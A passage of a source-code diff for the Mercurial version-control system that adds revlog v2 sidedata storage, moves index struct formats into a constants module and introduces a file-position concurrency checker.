from __future__ import absolute_import +GENERALDELTA_REQUIREMENT = b'generaldelta' +DOTENCODE_REQUIREMENT = b'dotencode' +STORE_REQUIREMENT = b'store' +FNCACHE_REQUIREMENT = b'fncache' + # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. NARROW_REQUIREMENT = b'narrowhg-experimental' @@ -21,9 +26,11 @@ # Stores manifest in Tree structure TREEMANIFEST_REQUIREMENT = b'treemanifest' +REVLOGV1_REQUIREMENT = b'revlogv1' + # Increment the sub-version when the revlog v2 format changes to lock out old # clients. -REVLOGV2_REQUIREMENT = b'exp-revlogv2.1' +REVLOGV2_REQUIREMENT = b'exp-revlogv2.2' # A repository with the sparserevlog feature will have delta chains that # can spread over a larger span. Sparse reading cuts these large spans into diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -1,6 +1,6 @@ # revlog.py - storage back-end for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -13,6 +13,7 @@ from __future__ import absolute_import +import binascii import collections import contextlib import errno @@ -28,6 +29,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, short, wdirfilenodeids, wdirhex, @@ -39,6 +41,10 @@ from .revlogutils.constants import ( FLAG_GENERALDELTA, FLAG_INLINE_DATA, + INDEX_ENTRY_V0, + INDEX_ENTRY_V1, + INDEX_ENTRY_V2, + INDEX_HEADER, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -119,10 +125,10 @@ # Flag processors for REVIDX_ELLIPSIS. 
def ellipsisreadprocessor(rl, text): - return text, False, {} - - -def ellipsiswriteprocessor(rl, text, sidedata): + return text, False + + +def ellipsiswriteprocessor(rl, text): return text, False @@ -203,6 +209,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -214,20 +221,9 @@ node = attr.ib(default=None) -# index v0: -# 4 bytes: offset -# 4 bytes: compressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 20 bytes: parent 1 nodeid -# 20 bytes: parent 2 nodeid -# 20 bytes: nodeid -indexformatv0 = struct.Struct(b">4l20s20s20s") -indexformatv0_pack = indexformatv0.pack -indexformatv0_unpack = indexformatv0.unpack - - class revlogoldindex(list): + entry_size = INDEX_ENTRY_V0.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -279,11 +275,8 @@ class revlogoldio(object): - def __init__(self): - self.size = indexformatv0.size - def parseindex(self, data, inline): - s = self.size + s = INDEX_ENTRY_V0.size index = [] nodemap = nodemaputil.NodeMap({nullid: nullrev}) n = off = 0 @@ -291,7 +284,7 @@ while off + s <= l: cur = data[off : off + s] off += s - e = indexformatv0_unpack(cur) + e = INDEX_ENTRY_V0.unpack(cur) # transform to revlogv1 format e2 = ( offset_type(e[0], 0), @@ -311,6 +304,13 @@ return index, None def packentry(self, entry, node, version, rev): + """return the binary representation of an entry + + entry: a tuple containing all the values (see index.__getitem__) + node: a callback to convert a revision to nodeid + version: the changelog version + rev: the revision number + """ if gettype(entry[0]): raise error.RevlogError( _(b'index entry flags need revlog version 1') @@ -324,24 +324,8 @@ node(entry[6]), entry[7], ) - return indexformatv0_pack(*e2) - - -# index ng: -# 6 bytes: offset -# 2 bytes: flags -# 4 bytes: compressed length -# 4 bytes: uncompressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 4 
bytes: parent 1 rev -# 4 bytes: parent 2 rev -# 32 bytes: nodeid -indexformatng = struct.Struct(b">Qiiiiii20s12x") -indexformatng_pack = indexformatng.pack -versionformat = struct.Struct(b">I") -versionformat_pack = versionformat.pack -versionformat_unpack = versionformat.unpack + return INDEX_ENTRY_V0.pack(*e2) + # corresponds to uncompressed length of indexformatng (2 gigs, 4-byte # signed integer) @@ -349,18 +333,27 @@ class revlogio(object): - def __init__(self): - self.size = indexformatng.size - def parseindex(self, data, inline): # call the C implementation to parse the index data index, cache = parsers.parse_index2(data, inline) return index, cache def packentry(self, entry, node, version, rev): - p = indexformatng_pack(*entry) + p = INDEX_ENTRY_V1.pack(*entry) if rev == 0: - p = versionformat_pack(version) + p[4:] + p = INDEX_HEADER.pack(version) + p[4:] + return p + + +class revlogv2io(object): + def parseindex(self, data, inline): + index, cache = parsers.parse_index2(data, inline, revlogv2=True) + return index, cache + + def packentry(self, entry, node, version, rev): + p = INDEX_ENTRY_V2.pack(*entry) + if rev == 0: + p = INDEX_HEADER.pack(version) + p[4:] return p @@ -421,6 +414,11 @@ If `upperboundcomp` is not None, this is the expected maximal gain from compression for the data content. + + `concurrencychecker` is an optional function that receives 3 arguments: a + file handle, a filename, and an expected position. It should check whether + the current position in the file handle is valid, and log/warn/fail (by + raising). 
""" _flagserrorclass = error.RevlogError @@ -435,6 +433,7 @@ censorable=False, upperboundcomp=None, persistentnodemap=False, + concurrencychecker=None, ): """ create a revlog object @@ -448,14 +447,9 @@ self.datafile = datafile or (indexfile[:-2] + b".d") self.nodemap_file = None if persistentnodemap: - if indexfile.endswith(b'.a'): - pending_path = indexfile[:-4] + b".n.a" - if opener.exists(pending_path): - self.nodemap_file = pending_path - else: - self.nodemap_file = indexfile[:-4] + b".n" - else: - self.nodemap_file = indexfile[:-2] + b".n" + self.nodemap_file = nodemaputil.get_nodemap_file( + opener, self.indexfile + ) self.opener = opener # When True, indexfile is opened with checkambig=True at writing, to @@ -495,6 +489,8 @@ self._loadindex() + self._concurrencychecker = concurrencychecker + def _loadindex(self): mmapindexthreshold = None opts = self.opener.options @@ -531,8 +527,6 @@ if self._mmaplargeindex and b'mmapindexthreshold' in opts: mmapindexthreshold = opts[b'mmapindexthreshold'] self.hassidedata = bool(opts.get(b'side-data', False)) - if self.hassidedata: - self._flagprocessors[REVIDX_SIDEDATA] = sidedatautil.processors self._sparserevlog = bool(opts.get(b'sparse-revlog', False)) withsparseread = bool(opts.get(b'with-sparse-read', False)) # sparse-revlog forces sparse-read @@ -575,7 +569,7 @@ else: indexdata = f.read() if len(indexdata) > 0: - versionflags = versionformat_unpack(indexdata[:4])[0] + versionflags = INDEX_HEADER.unpack(indexdata[:4])[0] self._initempty = False else: versionflags = newversionflags @@ -617,7 +611,11 @@ % (flags >> 16, fmt, self.indexfile) ) - self._inline = versionflags & FLAG_INLINE_DATA + # There is a bug in the transaction handling when going from an + # inline revlog to a separate index and data file. Turn it off until + # it's fixed, since v2 revlogs sometimes get rewritten on exchange. + # See issue6485 + self._inline = False # generaldelta implied by version 2 revlogs. 
self._generaldelta = True @@ -625,6 +623,10 @@ raise error.RevlogError( _(b'unknown version (%d) in revlog %s') % (fmt, self.indexfile) ) + + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid + # sparse-revlog can't be on without general-delta (issue6056) if not self._generaldelta: self._sparserevlog = False @@ -647,6 +649,8 @@ self._io = revlogio() if self.version == REVLOGV0: self._io = revlogoldio() + elif fmt == REVLOGV2: + self._io = revlogv2io() elif devel_nodemap: self._io = NodemapRevlogIO() elif use_rust_index: @@ -831,6 +835,11 @@ def length(self, rev): return self.index[rev][1] + def sidedata_length(self, rev): + if self.version & 0xFFFF != REVLOGV2: + return 0 + return self.index[rev][9] + def rawsize(self, rev): """return the length of the uncompressed text for a given revision""" l = self.index[rev][2] @@ -875,8 +884,10 @@ if rev == wdirrev: raise error.WdirUnsupported raise - - return entry[5], entry[6] + if entry[5] == nullrev: + return entry[6], entry[5] + else: + return entry[5], entry[6] # fast parentrevs(rev) where rev isn't filtered _uncheckedparentrevs = parentrevs @@ -897,7 +908,11 @@ def parents(self, node): i = self.index d = i[self.rev(node)] - return i[d[5]][7], i[d[6]][7] # map revisions to nodes inline + # inline node() to avoid function call overhead + if d[5] == nullid: + return i[d[6]][7], i[d[5]][7] + else: + return i[d[5]][7], i[d[6]][7] def chainlen(self, rev): return self._chaininfo(rev)[0] @@ -1694,8 +1709,8 @@ end = int(iend[0] >> 16) + iend[1] if self._inline: - start += (startrev + 1) * self._io.size - end += (endrev + 1) * self._io.size + start += (startrev + 1) * self.index.entry_size + end += (endrev + 1) * self.index.entry_size length = end - start return start, self._getsegment(start, length, df=df) @@ -1729,7 +1744,7 @@ start = self.start length = self.length inline = self._inline - iosize = self._io.size + iosize = self.index.entry_size buffer = util.buffer l = [] @@ -1828,7 +1843,7 @@ 
elif operation == b'read': return flagutil.processflagsread(self, text, flags) else: # write operation - return flagutil.processflagswrite(self, text, flags, None) + return flagutil.processflagswrite(self, text, flags) def revision(self, nodeorrev, _df=None, raw=False): """return an uncompressed revision of a given node or revision @@ -1873,10 +1888,17 @@ # revision or might need to be processed to retrieve the revision. rev, rawtext, validated = self._rawtext(node, rev, _df=_df) + if self.version & 0xFFFF == REVLOGV2: + if rev is None: + rev = self.rev(node) + sidedata = self._sidedata(rev) + else: + sidedata = {} + if raw and validated: # if we don't want to process the raw text and that raw # text is cached, we can exit early. - return rawtext, {} + return rawtext, sidedata if rev is None: rev = self.rev(node) # the revlog's flag for this revision @@ -1885,20 +1907,14 @@ if validated and flags == REVIDX_DEFAULT_FLAGS: # no extra flags set, no flag processor runs, text = rawtext - return rawtext, {} - - sidedata = {} + return rawtext, sidedata + if raw: validatehash = flagutil.processflagsraw(self, rawtext, flags) text = rawtext else: - try: - r = flagutil.processflagsread(self, rawtext, flags) - except error.SidedataHashError as exc: - msg = _(b"integrity check failed on %s:%s sidedata key %d") - msg %= (self.indexfile, pycompat.bytestr(rev), exc.sidedatakey) - raise error.RevlogError(msg) - text, validatehash, sidedata = r + r = flagutil.processflagsread(self, rawtext, flags) + text, validatehash = r if validatehash: self.checkhash(text, node, rev=rev) if not validated: @@ -1949,6 +1965,21 @@ del basetext # let us have a chance to free memory early return (rev, rawtext, False) + def _sidedata(self, rev): + """Return the sidedata for a given revision number.""" + index_entry = self.index[rev] + sidedata_offset = index_entry[8] + sidedata_size = index_entry[9] + + if self._inline: + sidedata_offset += self.index.entry_size * (1 + rev) + if sidedata_size == 0: + 
return {} + + segment = self._getsegment(sidedata_offset, sidedata_size) + sidedata = sidedatautil.deserialize_sidedata(segment) + return sidedata + def rawdata(self, nodeorrev, _df=None): """return an uncompressed raw data of a given node or revision number. @@ -2041,7 +2072,7 @@ # the temp file replace the real index when we exit the context # manager - tr.replace(self.indexfile, trindex * self._io.size) + tr.replace(self.indexfile, trindex * self.index.entry_size) nodemaputil.setup_persistent_nodemap(tr, self) self._chunkclear() @@ -2082,20 +2113,15 @@ if sidedata is None: sidedata = {} - flags = flags & ~REVIDX_SIDEDATA elif not self.hassidedata: raise error.ProgrammingError( _(b"trying to add sidedata to a revlog who don't support them") ) - else: - flags |= REVIDX_SIDEDATA if flags: node = node or self.hash(text, p1, p2) - rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata - ) + rawtext, validatehash = flagutil.processflagswrite(self, text, flags) # If the flag processor modifies the revision data, ignore any provided # cachedelta. 
@@ -2111,8 +2137,9 @@ ) node = node or self.hash(rawtext, p1, p2) - if self.index.has_node(node): - return node + rev = self.index.get_rev(node) + if rev is not None: + return rev if validatehash: self.checkhash(rawtext, node, p1=p1, p2=p2) @@ -2127,6 +2154,7 @@ flags, cachedelta=cachedelta, deltacomputer=deltacomputer, + sidedata=sidedata, ) def addrawrevision( @@ -2140,6 +2168,7 @@ flags, cachedelta=None, deltacomputer=None, + sidedata=None, ): """add a raw revision with known flags, node and parents useful when reusing a revision not stored in this revlog (ex: received @@ -2162,6 +2191,7 @@ ifh, dfh, deltacomputer=deltacomputer, + sidedata=sidedata, ) finally: if dfh: @@ -2237,7 +2267,9 @@ compressor = engine.revlogcompressor(self._compengineopts) self._decompressors[t] = compressor except KeyError: - raise error.RevlogError(_(b'unknown compression type %r') % t) + raise error.RevlogError( + _(b'unknown compression type %s') % binascii.hexlify(t) + ) return compressor.decompress(data) @@ -2255,6 +2287,7 @@ dfh, alwayscache=False, deltacomputer=None, + sidedata=None, ): """internal function to add revisions to the log @@ -2287,7 +2320,23 @@ curr = len(self) prev = curr - 1 - offset = self.end(prev) + + offset = self._get_data_offset(prev) + + if self._concurrencychecker: + if self._inline: + # offset is "as if" it were in the .d file, so we need to add on + # the size of the entry metadata. + self._concurrencychecker( + ifh, self.indexfile, offset + curr * self.index.entry_size + ) + else: + # Entries in the .i are a consistent size. 
+ self._concurrencychecker( + ifh, self.indexfile, curr * self.index.entry_size + ) + self._concurrencychecker(dfh, self.datafile, offset) + p1r, p2r = self.rev(p1), self.rev(p2) # full versions are inserted when the needed deltas @@ -2309,6 +2358,16 @@ deltainfo = deltacomputer.finddeltainfo(revinfo, fh) + if sidedata: + serialized_sidedata = sidedatautil.serialize_sidedata(sidedata) + sidedata_offset = offset + deltainfo.deltalen + else: + serialized_sidedata = b"" + # Don't store the offset if the sidedata is empty, that way + # we can easily detect empty sidedata and they will be no different + # than ones we manually add. + sidedata_offset = 0 + e = ( offset_type(offset, flags), deltainfo.deltalen, @@ -2318,12 +2377,24 @@ p1r, p2r, node, + sidedata_offset, + len(serialized_sidedata), ) + + if self.version & 0xFFFF != REVLOGV2: + e = e[:8] + self.index.append(e) - entry = self._io.packentry(e, self.node, self.version, curr) self._writeentry( - transaction, ifh, dfh, entry, deltainfo.data, link, offset + transaction, + ifh, + dfh, + entry, + deltainfo.data, + link, + offset, + serialized_sidedata, ) rawtext = btext[0] @@ -2334,9 +2405,31 @@ if type(rawtext) == bytes: # only accept immutable objects self._revisioncache = (node, curr, rawtext) self._chainbasecache[curr] = deltainfo.chainbase - return node - - def _writeentry(self, transaction, ifh, dfh, entry, data, link, offset): + return curr + + def _get_data_offset(self, prev): + """Returns the current offset in the (in-transaction) data file. + Versions < 2 of the revlog can get this O(1), revlog v2 needs a docket + file to store that information: since sidedata can be rewritten to the + end of the data file within a transaction, you can have cases where, for + example, rev `n` does not have sidedata while rev `n - 1` does, leading + to `n - 1`'s sidedata being written after `n`'s data. 
+ + TODO cache this in a docket file before getting out of experimental.""" + if self.version & 0xFFFF != REVLOGV2: + return self.end(prev) + + offset = 0 + for rev, entry in enumerate(self.index): + sidedata_end = entry[8] + entry[9] + # Sidedata for a previous rev has potentially been written after + # this rev's end, so take the max. + offset = max(self.end(rev), offset, sidedata_end) + return offset + + def _writeentry( + self, transaction, ifh, dfh, entry, data, link, offset, sidedata + ): # Files opened in a+ mode have inconsistent behavior on various # platforms. Windows requires that a file positioning call be made # when the file handle transitions between reads and writes. See @@ -2360,13 +2453,17 @@ if data[0]: dfh.write(data[0]) dfh.write(data[1]) + if sidedata: + dfh.write(sidedata) ifh.write(entry) else: - offset += curr * self._io.size + offset += curr * self.index.entry_size transaction.add(self.indexfile, offset) ifh.write(entry) ifh.write(data[0]) ifh.write(data[1]) + if sidedata: + ifh.write(sidedata) self._enforceinlinesize(transaction, ifh) nodemaputil.setup_persistent_nodemap(transaction, self) @@ -2375,6 +2472,7 @@ deltas, linkmapper, transaction, + alwayscache=False, addrevisioncb=None, duplicaterevisioncb=None, ): @@ -2397,7 +2495,7 @@ if r: end = self.end(r - 1) ifh = self._indexfp(b"a+") - isize = r * self._io.size + isize = r * self.index.entry_size if self._inline: transaction.add(self.indexfile, end + isize) dfh = None @@ -2418,15 +2516,16 @@ deltacomputer = deltautil.deltacomputer(self) # loop through our set of deltas for data in deltas: - node, p1, p2, linknode, deltabase, delta, flags = data + node, p1, p2, linknode, deltabase, delta, flags, sidedata = data link = linkmapper(linknode) flags = flags or REVIDX_DEFAULT_FLAGS - if self.index.has_node(node): + rev = self.index.get_rev(node) + if rev is not None: # this can happen if two branches make the same change - self._nodeduplicatecallback(transaction, node) + 
self._nodeduplicatecallback(transaction, rev) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, rev) empty = False continue @@ -2464,7 +2563,7 @@ # We're only using addgroup() in the context of changegroup # generation so the revision data can always be handled as raw # by the flagprocessor. - self._addrevision( + rev = self._addrevision( node, None, transaction, @@ -2475,12 +2574,13 @@ (baserev, delta), ifh, dfh, - alwayscache=bool(addrevisioncb), + alwayscache=alwayscache, deltacomputer=deltacomputer, + sidedata=sidedata, ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False if not dfh and not self._inline: @@ -2551,9 +2651,9 @@ end = self.start(rev) if not self._inline: transaction.add(self.datafile, end) - end = rev * self._io.size + end = rev * self.index.entry_size else: - end += rev * self._io.size + end += rev * self.index.entry_size transaction.add(self.indexfile, end) @@ -2592,7 +2692,7 @@ f.seek(0, io.SEEK_END) actual = f.tell() f.close() - s = self._io.size + s = self.index.entry_size i = max(0, actual // s) di = actual - (i * s) if self._inline: @@ -2621,6 +2721,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -2649,6 +2750,7 @@ deltamode=deltamode, revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, + sidedata_helpers=sidedata_helpers, ) DELTAREUSEALWAYS = b'always' @@ -3087,3 +3189,54 @@ ) return d + + def rewrite_sidedata(self, helpers, startrev, endrev): + if self.version & 0xFFFF != REVLOGV2: + return + # inline are not yet supported because they suffer from an issue when + # rewriting them (since it's not an append-only operation). + # See issue6485. 
+ assert not self._inline + if not helpers[1] and not helpers[2]: + # Nothing to generate or remove + return + + new_entries = [] + # append the new sidedata + with self._datafp(b'a+') as fp: + # Maybe this bug still exists, see revlog._writeentry + fp.seek(0, os.SEEK_END) + current_offset = fp.tell() + for rev in range(startrev, endrev + 1): + entry = self.index[rev] + new_sidedata = storageutil.run_sidedata_helpers( + store=self, + sidedata_helpers=helpers, + sidedata={}, + rev=rev, + ) + + serialized_sidedata = sidedatautil.serialize_sidedata( + new_sidedata + ) + if entry[8] != 0 or entry[9] != 0: + # rewriting entries that already have sidedata is not + # supported yet, because it introduces garbage data in the + # revlog. + msg = b"Rewriting existing sidedata is not supported yet" + raise error.Abort(msg) + entry = entry[:8] + entry += (current_offset, len(serialized_sidedata)) + + fp.write(serialized_sidedata) + new_entries.append(entry) + current_offset += len(serialized_sidedata) + + # rewrite the new index entries + with self._indexfp(b'w+') as fp: + fp.seek(startrev * self.index.entry_size) + for i, entry in enumerate(new_entries): + rev = startrev + i + self.index.replace_sidedata_info(rev, entry[8], entry[9]) + packed = self._io.packentry(entry, self.node, self.version, rev) + fp.write(packed) diff --git a/mercurial/revlogutils/concurrency_checker.py b/mercurial/revlogutils/concurrency_checker.py new file mode 100644 --- /dev/null +++ b/mercurial/revlogutils/concurrency_checker.py @@ -0,0 +1,38 @@ +from ..i18n import _ +from .. import error + + +def get_checker(ui, revlog_name=b'changelog'): + """Get a function that checks file handle position is as expected. + + This is used to ensure that files haven't been modified outside of our + knowledge (such as on a networked filesystem, if `hg debuglocks` was used, + or writes to .hg that ignored locks happened). 
+ + Due to revlogs supporting a concept of buffered, delayed, or diverted + writes, we're allowing the files to be shorter than expected (the data may + not have been written yet), but they can't be longer. + + Please note that this check is not perfect; it can't detect all cases (there + may be false-negatives/false-OKs), but it should never claim there's an + issue when there isn't (false-positives/false-failures). + """ + + vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name) + # Avoid any `fh.tell` cost if this isn't enabled. + if not vpos or vpos not in [b'log', b'warn', b'fail']: + return None + + def _checker(fh, fn, expected): + if fh.tell() <= expected: + return + + msg = _(b'%s: file cursor at position %d, expected %d') + # Always log if we're going to warn or fail. + ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected) + if vpos == b'warn': + ui.warn((msg + b'\n') % (fn, fh.tell(), expected)) + elif vpos == b'fail': + raise error.RevlogError(msg % (fn, fh.tell(), expected)) + + return _checker diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -1,6 +1,6 @@ # revlogdeltas.py - constant used for revlog logic # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the @@ -9,14 +9,21 @@ from __future__ import absolute_import +import struct + from ..interfaces import repository -# revlog header flags +### main revlog header + +INDEX_HEADER = struct.Struct(b">I") + +## revlog version REVLOGV0 = 0 REVLOGV1 = 1 # Dummy value until file format is finalized. -# Reminder: change the bounds check in revlog.__init__ when this is changed. REVLOGV2 = 0xDEAD + +## global revlog header flags # Shared across v1 and v2. 
FLAG_INLINE_DATA = 1 << 16 # Only used by v1, implied by v2. @@ -27,6 +34,46 @@ REVLOGV1_FLAGS = FLAG_INLINE_DATA | FLAG_GENERALDELTA REVLOGV2_FLAGS = FLAG_INLINE_DATA +### individual entry + +## index v0: +# 4 bytes: offset +# 4 bytes: compressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 20 bytes: parent 1 nodeid +# 20 bytes: parent 2 nodeid +# 20 bytes: nodeid +INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s") + +## index v1 +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x") +assert INDEX_ENTRY_V1.size == 32 * 2 + +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +# 8 bytes: sidedata offset +# 4 bytes: sidedata compressed length +# 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) +INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQi20x") +assert INDEX_ENTRY_V2.size == 32 * 3 + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the diff --git a/mercurial/revlogutils/deltas.py b/mercurial/revlogutils/deltas.py --- a/mercurial/revlogutils/deltas.py +++ b/mercurial/revlogutils/deltas.py @@ -1,6 +1,6 @@ # revlogdeltas.py - Logic around delta computation for revlog # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/revlogutils/flagutil.py b/mercurial/revlogutils/flagutil.py --- a/mercurial/revlogutils/flagutil.py +++ b/mercurial/revlogutils/flagutil.py @@ -84,7 +84,7 @@ flagprocessors[flag] = processor -def processflagswrite(revlog, text, 
flags, sidedata): +def processflagswrite(revlog, text, flags): """Inspect revision data flags and applies write transformations defined by registered flag processors. @@ -100,9 +100,12 @@ processed text and ``validatehash`` is a bool indicating whether the returned text should be checked for hash integrity. """ - return _processflagsfunc(revlog, text, flags, b'write', sidedata=sidedata)[ - :2 - ] + return _processflagsfunc( + revlog, + text, + flags, + b'write', + )[:2] def processflagsread(revlog, text, flags): @@ -145,14 +148,14 @@ return _processflagsfunc(revlog, text, flags, b'raw')[1] -def _processflagsfunc(revlog, text, flags, operation, sidedata=None): +def _processflagsfunc(revlog, text, flags, operation): """internal function to process flag on a revlog This function is private to this module, code should never needs to call it directly.""" # fast path: no flag processors will run if flags == 0: - return text, True, {} + return text, True if operation not in (b'read', b'write', b'raw'): raise error.ProgrammingError(_(b"invalid '%s' operation") % operation) # Check all flags are known. @@ -168,7 +171,6 @@ if operation == b'write': orderedflags = reversed(orderedflags) - outsidedata = {} for flag in orderedflags: # If a flagprocessor has been registered for a known flag, apply the # related operation transform and update result tuple. 
@@ -186,10 +188,9 @@ if operation == b'raw': vhash = rawtransform(revlog, text) elif operation == b'read': - text, vhash, s = readtransform(revlog, text) - outsidedata.update(s) + text, vhash = readtransform(revlog, text) else: # write operation - text, vhash = writetransform(revlog, text, sidedata) + text, vhash = writetransform(revlog, text) validatehash = validatehash and vhash - return text, validatehash, outsidedata + return text, validatehash diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -53,7 +53,11 @@ try: with revlog.opener(filename) as fd: if use_mmap: - data = util.buffer(util.mmapread(fd, data_length)) + try: + data = util.buffer(util.mmapread(fd, data_length)) + except ValueError: + # raised when the read file is too small + data = b'' else: data = fd.read(data_length) except (IOError, OSError) as e: @@ -81,9 +85,9 @@ if tr.hasfinalize(callback_id): return # no need to register again tr.addpending( - callback_id, lambda tr: _persist_nodemap(tr, revlog, pending=True) + callback_id, lambda tr: persist_nodemap(tr, revlog, pending=True) ) - tr.addfinalize(callback_id, lambda tr: _persist_nodemap(tr, revlog)) + tr.addfinalize(callback_id, lambda tr: persist_nodemap(tr, revlog)) class _NoTransaction(object): @@ -123,20 +127,33 @@ return # we do not use persistent_nodemap on this revlog notr = _NoTransaction() - _persist_nodemap(notr, revlog) + persist_nodemap(notr, revlog) for k in sorted(notr._postclose): notr._postclose[k](None) -def _persist_nodemap(tr, revlog, pending=False): +def delete_nodemap(tr, repo, revlog): + """ Delete nodemap data on disk for a given revlog""" + if revlog.nodemap_file is None: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) + repo.svfs.unlink(revlog.nodemap_file) + + +def persist_nodemap(tr, revlog, pending=False, force=False): """Write nodemap data on 
disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): raise error.ProgrammingError( "cannot persist nodemap of a filtered changelog" ) if revlog.nodemap_file is None: - msg = "calling persist nodemap on a revlog without the feature enableb" - raise error.ProgrammingError(msg) + if force: + revlog.nodemap_file = get_nodemap_file( + revlog.opener, revlog.indexfile + ) + else: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) can_incremental = util.safehasattr(revlog.index, "nodemap_data_incremental") ondisk_docket = revlog._nodemap_docket @@ -634,3 +651,14 @@ if isinstance(entry, dict): return _find_node(entry, node[1:]) return entry + + +def get_nodemap_file(opener, indexfile): + if indexfile.endswith(b'.a'): + pending_path = indexfile[:-4] + b".n.a" + if opener.exists(pending_path): + return pending_path + else: + return indexfile[:-4] + b".n" + else: + return indexfile[:-2] + b".n" diff --git a/mercurial/revlogutils/sidedata.py b/mercurial/revlogutils/sidedata.py --- a/mercurial/revlogutils/sidedata.py +++ b/mercurial/revlogutils/sidedata.py @@ -13,9 +13,8 @@ The current implementation is experimental and subject to changes. Do not rely on it in production. -Sidedata are stored in the revlog itself, within the revision rawtext. They -are inserted and removed from it using the flagprocessors mechanism. The following -format is currently used:: +Sidedata are stored in the revlog itself, thanks to a new version of the +revlog. 
The following format is currently used:: initial header: <number of sidedata; 2 bytes> @@ -60,48 +59,35 @@ SIDEDATA_ENTRY = struct.Struct('>HL20s') -def sidedatawriteprocessor(rl, text, sidedata): +def serialize_sidedata(sidedata): sidedata = list(sidedata.items()) sidedata.sort() - rawtext = [SIDEDATA_HEADER.pack(len(sidedata))] + buf = [SIDEDATA_HEADER.pack(len(sidedata))] for key, value in sidedata: digest = hashutil.sha1(value).digest() - rawtext.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) + buf.append(SIDEDATA_ENTRY.pack(key, len(value), digest)) for key, value in sidedata: - rawtext.append(value) - rawtext.append(bytes(text)) - return b''.join(rawtext), False + buf.append(value) + buf = b''.join(buf) + return buf -def sidedatareadprocessor(rl, text): +def deserialize_sidedata(blob): sidedata = {} offset = 0 - (nbentry,) = SIDEDATA_HEADER.unpack(text[: SIDEDATA_HEADER.size]) + (nbentry,) = SIDEDATA_HEADER.unpack(blob[: SIDEDATA_HEADER.size]) offset += SIDEDATA_HEADER.size dataoffset = SIDEDATA_HEADER.size + (SIDEDATA_ENTRY.size * nbentry) for i in range(nbentry): nextoffset = offset + SIDEDATA_ENTRY.size - key, size, storeddigest = SIDEDATA_ENTRY.unpack(text[offset:nextoffset]) + key, size, storeddigest = SIDEDATA_ENTRY.unpack(blob[offset:nextoffset]) offset = nextoffset # read the data associated with that entry nextdataoffset = dataoffset + size - entrytext = text[dataoffset:nextdataoffset] + entrytext = bytes(blob[dataoffset:nextdataoffset]) readdigest = hashutil.sha1(entrytext).digest() if storeddigest != readdigest: raise error.SidedataHashError(key, storeddigest, readdigest) sidedata[key] = entrytext dataoffset = nextdataoffset - text = text[dataoffset:] - return text, True, sidedata - - -def sidedatarawprocessor(rl, text): - # side data modifies rawtext and prevent rawtext hash validation - return False - - -processors = ( - sidedatareadprocessor, - sidedatawriteprocessor, - sidedatarawprocessor, -) + return sidedata diff --git 
